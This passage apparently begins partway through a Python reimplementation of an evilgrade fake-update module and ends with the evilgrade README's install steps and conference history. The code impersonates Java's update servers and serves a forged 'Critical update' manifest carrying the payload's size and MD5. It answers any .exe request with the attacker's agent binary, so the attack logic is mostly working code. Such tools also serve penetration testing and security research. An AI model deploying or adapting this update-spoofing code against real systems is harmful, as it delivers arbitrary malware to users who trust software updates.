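        "<update><title><%TITLE%></title><name><%NAME%></name>"
        "<file><%URL_FILE%>.<%URL_FILE_EXT%></file><size><%AGENTSIZE%></size>"
        "<md5><%AGENTMD5%></md5></update>"),
}

# Same shape as the Perl $base above, trimmed to the fields this model uses.
MODULE = {
    "vh": r"^(java\.sun\.com|javadl-esd\.sun\.com)$",
    "request": [
        {"req": r"^/java_update\.xml$", "type": "file", "bin": "", "parse": "1",
         "file": "./include/sunjava/sunjava_update.xml"},
        {"req": r"\.exe", "type": "agent", "bin": 1, "parse": ""},
    ],
    "options": {
        "agent": {"val": "./agent/agent.exe"},
        "title": {"val": "Critical update"},
        # 'dynamic' option: evaluated per request, like the RndAlpha() expression in the module above.
        "name": {"val": lambda: "javaupdate" + random.choice(string.ascii_lowercase), "dynamic": 1},
    },
}

def agent_metadata(agent):
    """The fields 'start' fills in for you (tip 3): agentmd5, agentsha256, agentsize."""
    return {"agentmd5": hashlib.md5(agent).hexdigest(),
            "agentsha256": hashlib.sha256(agent).hexdigest(),
            "agentsize": str(len(agent))}

def render(template, options, path, agent):
    """Replace every <%TAG%> (tip 4): option names upper-cased, the agent fields,
    and URL_FILE / URL_FILE_EXT taken from the requested path (assumed semantics)."""
    stem, ext = posixpath.splitext(posixpath.basename(path))
    values = {k.upper(): v for k, v in agent_metadata(agent).items()}
    values.update({"URL_FILE": stem, "URL_FILE_EXT": ext.lstrip(".")})
    for name, opt in options.items():
        val = opt["val"]
        values[name.upper()] = val() if opt.get("dynamic") else str(val)

    def substitute(match):
        tag = match.group(1)
        if tag not in values:                       # catch template typos instead of leaking the tag
            raise KeyError(f"unknown tag <%{tag}%>")
        return values[tag]
    return re.sub(r"<%([A-Z0-9_]+)%>", substitute, template)

def handle(module, host, path, agent=AGENT_BYTES):
    """One HTTP request -> (status, body, is_binary), or None when the vhost is not ours.
    Request objects are tried in order and the first regex match answers, which is why a
    broad entry like '.exe' can sit last without shadowing the specific ones."""
    if not re.match(module["vh"], host):
        return None
    for req in module["request"]:
        if not re.search(req["req"], path):
            continue
        if req["type"] == "agent":
            return 200, agent, True
        body = req.get("string", "") if req["type"] == "string" else INCLUDE[req["file"]]
        if req["parse"]:
            body = render(body, module["options"], path, agent)
        return 200, body, bool(req["bin"])
    return 404, "", False

if __name__ == "__main__":
    print(handle(MODULE, "java.sun.com", "/java_update.xml"))
    print(handle(MODULE, "javadl-esd.sun.com", "/update/1.6.0/jre.exe")[:2])
```

Requests for a host outside 'vh' return None (the real framework's DNS server would never have pointed them here), the XML request comes back parsed with the live agent size and MD5, and anything ending in .exe is answered with the agent bytes as a binary body.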

REQUIREMENTS

Perl Modules
    Data::Dump
    Digest::MD5
    Time::HiRes
    RPC::XML

    INSTALL
    sudo apt install cpanminus
    sudo cpanm Data::Dump Digest::MD5 Time::HiRes RPC::XML
    git clone https://github.com/infobyte/evilgrade
    cd evilgrade
    ./evilgrade


    MORE INFORMATION
    This framework was presented in the following security conferences:
    · ekoparty 2007 [Buenos Aires, Argentina] [www.ekoparty.org]
    · Troopers 2008 [Munich, Germany] [www.troopers08.org]
    · Shakacon 2008 [Hawaii, USA] [www.shakacon.org]
    · H2HC 2009 [Brazil] [www.h2hc.com.br]
    · Blackhat Arsenal & Defcon 2010 [Las Vegas, USA] [www.blackhat.com www.defcon.org]

    AUTHOR
    Francisco Amato famato+at+infobytesec+dot+com

